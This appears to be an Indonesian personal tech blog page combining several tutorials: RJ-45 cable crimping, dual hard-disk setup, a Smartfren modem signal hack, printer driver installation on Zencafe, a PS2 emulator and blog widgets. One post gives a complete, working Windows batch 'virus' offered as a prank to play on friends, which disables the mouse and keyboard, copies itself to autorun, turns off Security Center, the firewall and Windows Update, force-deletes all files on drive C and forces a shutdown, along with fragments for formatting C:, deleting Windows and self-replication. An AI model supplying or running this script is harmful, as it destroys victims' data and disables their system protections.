translater


Cara Memasang Kabel UTP ke RJ-45

Cara memasang kabel UTP ke RJ-45

Berbagai peralatan yang dibutuhkan adalah sebagai berikut:
1. Kabel UTP
2. Konektor RJ 45
3. Climpping Tool

Gb. Climpping Tool
Perlu anda ketahui bahwa kabel UTP memiliki 4 pasang kabel kecil didalamnya yang memiliki warna yang berbeda. 4 pasang kabel itu adalah:
Pasangan 1 : Putih/Biru dan Biru,
Pasangan 2 : Putih/Oranye dan Oranye,
Pasangan 3 : Putih/Hijau dan Hijau,
Pasangan 4 : Putih/Coklat dan Coklat


Pemasangan kabel UTP sendiri terbagi dua jenis. Straight Through dan Cross Over. Perbedaannya adalah:
1. Straight Through
Jenis terminasi ini paling sering dipakai pada LAN Ethernet 10BaseT, untuk menghubungkan PC dengan HUB atau SWITCH, PC dengan outlet di dinding, ataupun untuk instalasi dari HUB ke outlet di dinding.
Secara warna, urutan kabel pada saat dipasang pada konektor RJ 45 adalah :
Pin 1 : Putih/Oranye
Pin 2 : Oranye
Pin 3 : Putih/Hijau
Pin 4 : Biru
Pin 5 : Putih Biru
Pin 6 : Hijau
Pin 7 : Putih/Coklat
Pin 8 : Coklat
**-> Urutan ini berlaku sama pada 2 sisi kabel.


2. Cross Over
Kabel jenis ini biasanya dipakai untuk menghubungkan HUB/SWITCH dengan HUB/SWITCH yang lain.
Urutan pemasangan :
Salah satu sisi kabel diterminasi sesuai dengan standard “Straight Through”, sedangkan sisi kabel lainnya, dilakukan “Cross-Over”, sbb :
Pin 1 : Putih/Hijau
Pin 2 : Hijau
Pin 3 : Putih/Oranye
Pin 4 : Biru
Pin 5 : Putih/Biru
Pin 6 : Oranye
Pin 7 : Putih/Coklat
Pin 8 : Coklat
Harap diingat bahwa yang di-cross-over hanya salah satu sisi kabel saja.
Berikut ini langkah-langkah pemasangan kabel UTP pada konektor RJ45:
1. Lepaskan jaket luar kabel UTP dengan hati-hati tanpa merusak 4 pasang kabel didalamnya dengan menggunakan climpping tool.
2. Potonglah dengan rapi 4 pasang kabel kecil itu sehingga hanya memiliki panjang setengah inci saja. Hal ini dimaksudkan agar kabel nantinya terpasang dengan erat pada konektor.
3. Bukalah klip pada konektor RJ45 lalu masukkan kabel-kabel tersebut ke dalam pin-pin didalamnya dengan susunan warna yang telah ditentukan.
4. Setelah itu eratkan konektor RJ45 dan kabel dengan menggunakan climpping tool kembali.


CARA PASANG 2 HARDISK PADA 1 KOMPUTER

Banyak orang menginginkan memori penyimpanan (harddisk) memiliki kapasitas yang besar yang sekiranya cukup untuk menyimpan semua file yang diinginkan, seperti lagu, film ataupun file-file yang memiliki kapasitas yang besar...Namun bagi yang keinginannya saat ini sudah mungkin hal tersebut tercapai, karena pada saat ini terakhir saya mengetahui ada HDD yang memiliki kapasitas sampai dengan 1 Terra, bahkan mungkin bisa lebih...bagi yang masih kurang dengan kapasitas yang super besar tersebut, ada jalan lain untuk mengatasinya yakni dengan cara melakukan penambahan HDD pada PC anda...namun untuk HDD yang baru (SATA) aturan yang berlaku tidaklah sulit untuk melakukan dual HDD pada PC, tapi pada HDD yang lama (IDE), pemberlakuan dengan penggunaan dual HDD sedikit lebih rumit, karena pada HDD yang IDE masih terdapatnya settingan menggubakan jumper HDD, Pengaturan tersebut berfungsi untuk mengatur (menentukan) hardisk mana yang akan menjadi master (tempat OS) dan hardisk mana yang menjadi slave, apabila kita menggunakan dua atau lebih hardisk... jadi saat booting sistem komputer akan boot langsung dari hardisk yang memiliki OS tersebut tanpa harus mencari dari hardisk yang lain. jamper master pada hardisk berarti hardisk itu dipakai sebagai progw/ window utama. sedang jamper slev berarti hardis itu sebagi hardisk kedua ata sebagai penyimpan data saja. bagaimana posisinya lihat label hardisknya.

Cara 1 untuk setting Dual HDD pada SATA
1. Anda Harus mengetahui secara pasti pada HDD mana OS anda terinstal.
2. Pasang kabel SATA HDD anda yang terinstal OS pada posisi SATA 1, agar anda mudah dan tidak perlu men-setting posisi HDD pada BIOS.
3. Jika sudah terpasang semua anda bisa langsung menggunakannya, namun setelah masuk pada layar destop di tunggu sampai dengan inisialisasi HDD pada HDD yang baru.

Cara 2 untuk setting dual HDD pada SATA
1. Anda Harus mengetahui secara pasti pada HDD mana OS anda terinstal.
2. Jika pada penyusunan kabel anda tidak urut, anda diharuskan setting HDD anda melalui BIOS, HDD yang terisi OS diharuskan terdapat pada posisi first(utama).
3. Setelah selesai setting BIOS melalui Configurasi HDD, anda bisa menggunakan HDD anda setelah inisialisasi HDD yang baru.

Cara 1 untuk setting dual HDD pada IDE
1. Sama seperti sebelumnya Anda Harus mengetahui secara pasti pada HDD mana OS anda terinstal.
2. Pasang Jumper anda pada posisi master untuk HDD yang berisi OS, sedangkan yang satunya lagi anda bisa meletakkan jumper pada posisi slave, atau amannya anda bisa melepas jumper tersebut.
3. Nyalakan komputer anda dan lakukan inisialisasi HDD sewaktu startup

Cara 2 untuk setting dual HDD pada IDE
1. Anda Harus mengetahui secara pasti pada HDD mana OS anda terinstal.
2. Jika pada penyusunan jumper anda tidak urut, anda diharuskan setting HDD anda melalui BIOS, HDD yang terisi OS diharuskan terdapat pada posisi first(utama).
3. Setelah selesai setting BIOS melalui Configurasi HDD, anda bisa menggunakan HDD anda setelah inisialisasi HDD yang baru.

Semoga artikel ini bermanfaat bagi pembaca, dan jika ada kesalahan atau cara-cara yang lebih praktis dan aman jangan lupa sharing ya....

sumber : 
http://choeicruut.blogspot.com/2010/03/cara-memasang-dual-harddisk-pada-pc.html

artikel keren
*mempercepat modem samartfren pake tembaga dan alumuniumfoil
*jalan pintas instal printer CANON IP1900 DI ZENCAFE
*bikin virus mudah menggunakan notepad
*cara maen PS2 di komputer


TUTORIAL PALING MUDAH MEMPERCEPAT KONEKSI MODEM SMARTFREN MENGGUNAKAN TEMBAGA DAN ALUMUNIUMFOIL


Permasalahan-permasalahan yang timbul seputar sinyal EVDO smart antara lain:
  1. Sinyal EVDO smart penuh, tapi dipake berinternet kok lambat
  2. Sinyal EVDO smart memiliki koneksi download bagus dan upload sangat jelek, dan juga ping lemah
  3. Sinyal EVDO smart memiliki koneksi upload bagus tapi koneksi download jelek
  4. Sinyal EVDO smart tidak terjangkau di dalam rumah, tetapi di luar rumah bagus

Cara Menguatkan Penerimaan Sinyal Smartfren

Sedangkan, solusi untuk memperkuat penerimaan sinyal modem EVDO smart adalah sebagai berikut, bahan-bahan yang diperlukan adalah :
  1. Kawat tembaga 30cm
  2. Ukuran kawat tembaga berdiameter 0.1 milimeter (kawat didapat dari kawat kabel)
  3. Aluminium foil berupa stiker, yang biasanya dijual dan dipakai untuk tambal panci bocor
  4. Kabel USB extender (kabelnya berupa kabel USB yang bening yang terlihat dalemannya, jangan kabel USB biasa) sepanjang 10 meter atau disambung (5 meter + 5 meter)

Cara membuat :
  1. Kupas kabel tembaga (jangan semuanya)
  2. Bagian yang kupas adalah di kedua ujungnya
  3. Lilitkan bagian salah satu ujung yang di kupas berapa kabel tembaga tersebut ke modem, bentuk modem fleksibel ya, beda modem, beda bentuk lilitan. Lilitkan sebanyak 4-5 kali lilitan
  4. Renggangkan lilitan tembaga sepanjang bentuk modem anda masing-masing
  5. Gunakan stiker aluminium foil sepanjang lilitan kabel tembaga tadi, pasang secara penampang (fungsinya adalah menjadi repeater penerimaan sinyal yang akan dipantulkan kembali pada lilitan kawat tembaga
  6. Ujung kawat tembaga satunya di biarkan menjulang ke atas, tergantung penempatan modem anda, mau vertical bisa, mau horizontal juga bisa
  7. Tancapkan kabel usb ext anda ke PC atau Laptop anda
  8. Settinglah bandwidth PC atau laptop anda yang ada pada trik dibawah ini untuk memodifikasi koneksi internet pada windows
Dari atas modem
dari bawah modem
Lalu trik untuk memodifikasi koneksi internet pada windows adalah sebagai berikut :
gpedit
  1. Klik start ==> Run
  2. Isi pada kolom run dengan gpedit.msc
  3. Lalu pilih Administrative Templates
  4. Lalu pilih Network
  5. Lalu pilih QoS Packet Scheduler
  6. Lalu klik 2x pada Limit Reservable Bandwidth
  7. Klik Enable
  8. Isi Bandwidth limit (%) dengan Angka Nol ==> tekan Ok
  9. Restart komputer PC atau Laptop anda

Koneksi internet yang bagus adalah mempunyai
  • ping result rendah
  • speed download lebih besar daripada speed upload

Hasil dari Cara Menguatkan Penerimaan Sinyal Smartfren

Berdasarkan pengalaman kami, koneksi internet smartfren bulanan 100ribu dengan kuota 6 gb memiliki hasil seperti dibawah ini dengan setelah memodifikasi modemnya dan setting bandwidth pada PC yang menggunakan operating system windows.
hasil test speed pagi
Test ke dua
test speed pagi kedua
Test Ketiga pada pukul 12.24PM, 15 April 2012
test ketiga
Test Keempat pada pukul 03.30 AM, 16 APril 2012


JALAN PINTAS INSTALL PRINTER CANON IP1900 DI ZENCAFE

kali inis saya akan membahas tata cara install printer jenis CANON IP1900 DI ZENCAFE..

ga usah banyak basa-basi langsung aja ke intinya,,

1.download driver printer yg ber ekstensi ".rpm"
    cnijfilter-common-3.00-1.i386.rpm
    
cnijfilter-ip1900series-3.00-1.i386.rpm
2.
Masuk ke terminal/console di folder yang tersimpan file yang telah di  download dengan user sebagai root.
3.terus ubah dulu file".rmp" ke file ".tgz".. dengan comand 
rpm2tgz nama_file.rpm
    
rpm2tgz cnijfilter-common-3.00-1.i386.rpm
   
rpm2tgz cnijfilter-ip1900series-3.00-1.i386.rpm
4.maka setelah itu file RPM akan berubah menjadi tgz,, conth
    
cnijfilter-common-3.00-1.i386.tgz
    
cnijfilter-ip1900series-3.00-1.i386.tgz
5
.Proses penginstalan dengan command : installpkg nama_file.tgz
6.setelah itu masuk ke menu 
 => Control Centre => Printer Manager
7.
Tambah kan printer dengan klik tombol add printer dan pilih driver ip1900 yang telah kita install.
8.setelah selesai,, coba lakukan print test page untukmengececk printer kita sudah bisa di pakai atu belu,,

SELAMAT MENCOBA

beritahu saya hasil kerja anda,!!!
coba baca artikel ini,, pasti berguna buat kalian,,

*CARA MEMBUAT VIRUS MUDAH DENGAN MENGGUNAKAN NOTEPAD
*CARA MAIN PS2 DI PC
*MASANG JAM PADA BLOG
*MEMBUAT EFEK FLASH (TEKS BERJALAN INDAH) PADA BLOG
*CARA MEMPERBESAR KAPASITAS R.A.M/VIRTUAL MEMORY


CARA MEMBUAT VIRUS YANG MUDAH (menggunakan notepad)

untuk para anak IT yang doyan iseng,,coba deh tips membuat virus ini,,
virus ini ga bahaya ko,, cukup aman buat bikin temen lu kaget dengan ekspresi wajah yang unik,,
hahahahha..

pertama,,
buka notepad.caranya
-klik start
-all program
-accessoris
-trus cari nama NOTEPAD trus buka
-masukin teks2 ini..

Trojan

mngirim dftar file dlm direktori

dir *.*>>Filelist.txt
ganti password admin
net user administrator PASSWORD HERE
membuat info IP
ipconfig >Computer-IP-address.txt

 BASIC

invisible command
@echo off
Swap mouse
rundll32 user,swapmousebutton
buka URL yg diinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr & beri pesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart
rundll32 mouse,disable
Disable keyboard stlh Restart
rundll32 keyboard,disable
Freezes kmptr stlh Restart
rundll32 user,disableoemlayer

Worm

memperbanyak diri didlm direktori
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lain
%0 >>other.bat
Pause

pause smpai tekan smbarang tombol
pause
pause 20 detik
@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

Perusak

copy ke Autorun
COPY %0 %windir%WINSTART.BAT
format drive C
format c: /q /autotest
delete Windows
DELTREE /Y %windir%
delete drive C dg paksa
DEL /F /S /Q C:
mematikan firewall & security center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0


Berikut hasil akhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f
-disables mouse & keyboard
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts [url]http://www.youtube.com[/url]
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"


-kalo udah kamu masukin teks2 di atas..
-save as dengan ekstensi .BAT

-terus rubah "SAVE AS TYPE" nya jadi all files


catetan: jangan coba di komkputer sendiri ya,, heheheheh


beritau saya hasil kerja anda ya,, :)


and jangan lupa follow blog ku,, ^_^


cara bermain PS2 di PC/komputer

nih untuk para GAMER sejati pasti ini yang kalian cari..
ok,,langsung aja ke intinya,,
pertama,,
kamu harus punya spek komputer yang memadai,,
conyoh nya,,
1.RAM minimal DDR 512 lebih bagus kalo lebih besar
2.prosesor minimal pentium 4.1.8MB
3.VGA minimum 64 mb
4.DVD rooms

trus download emulator nya di sini

kalo udah download,,

1. Buka file PCXS2 0.9.6 maka akan muncul gambar berikut ini

seting emulator ps2 di pc

2. Setelah itu klik Config dan klik configure

seting emulator ps2

3. Akan muncul menu Configuration, selanjutnya anda klik Set Plugins Directory

seting emulator ps2 di pc

4. Anda cari Plugins yang sudah anda simpan di PC anda selanjutnya klik OK,,,

seting emulator ps2

5. Selanjutnya anda seting bios klik Set Bios Directory download bios di google aja,,ya..

seting emulator ps2

6. Cari file Bios yang sudah anda simpan di PC, klik OK,,,

seting emulator ps2

7. Selesai, Selamat anda sudah bisa menseting emulatornya selanjutnya klik OK,,

seting emulator ps2 di pc

Sekarang anda sedah selesai menseting emulator ps2, sekarang anda tinggal mengikuti tutorial untuk cara mainkan PS2 d PC. semoga setelah membaca tutorial tersebut anda langsung bisa memainkan ps2 di pc anda tanpa adanya kendala lain yang muncul. karena saya sudah semaksimal mungkin memberikan yang terbaik untuk anda. ehh iya apakah anda sudah pernah mainkan PS1 di PC. kalau belum pernah silahkan baca dulu kalau ingin mencoba.


kalo ada yang kurang ngerti koment ya,,
dan jangan lupa follow..


memasang jam pada blog

1.anda masuk ke situs http://www.clocklink.com/
2.lalu pilih kategori bentuk jam yang anda inginkan
3.setelah anda menemukan bentuk jam yang anda suka lalu klick "VIEW HTML TAG"
4.klick "ACCEPT" untuk men stujui
5.anda bisa memilih berbagai warna yang anda sukai dengan memilih warna yang berada di bawah jam yang tadi anda pilih
6.pilih zona waktu di tempat anda berada dengan cara klick di sebelah kanan teks "timzone"
7.lau anda dapat mengatur ukuraN JAM,tetapi clocklink sudah memberikan ukuran standar,dan anda masih bisa merubahnya,
8.kemudian copy paste code HTML yang paling atas,jika code yang paling atas tidak berfungsi maka coba code HTML yang ada di bawah,

itulah sedikit tips dari saya,,
semoga bermanfaat , bila ada yang ingin di tanyakan silahkan koment ,,
trimakasih

jgn lupa follow..

@dany wardaya


cara membuat efek FLASH (teks berjalan indah) pada blog

1.masuk ke situs www.widgeo.net
2.pilih flash message/flash effects (sesuai yang anda sukai)
3.masukan pesan yang ingin anda masukan pada flash anda, pada box "your message here"
4.pilih paduan warna pada flash di box "multy collor"
5.ukuran pada box "size"
6.lalu pilih category blog anda di box sebelah kanan,,
7.jangan lupa centang "accept"
8.klick "get widget here"
9.lalu copy paste kan code HTML ke gadget anda

jadi deh,,
tolong koment bila ada yang tidak di mengerti,,

:)
don't forget follow..

@danny wardaya